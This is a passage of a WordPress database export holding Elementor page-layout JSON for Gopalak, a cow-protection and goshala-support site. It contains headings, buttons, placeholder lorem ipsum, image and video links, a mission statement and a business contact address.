here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9288,1594,'_elementor_page_assets','a:0:{}'),(9295,1595,'_elementor_edit_mode','builder'),(9296,1595,'_elementor_template_type','wp-page'),(9297,1595,'_elementor_version','3.7.8'),(9298,1595,'_wp_page_template','elementor_canvas'),(9299,1595,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\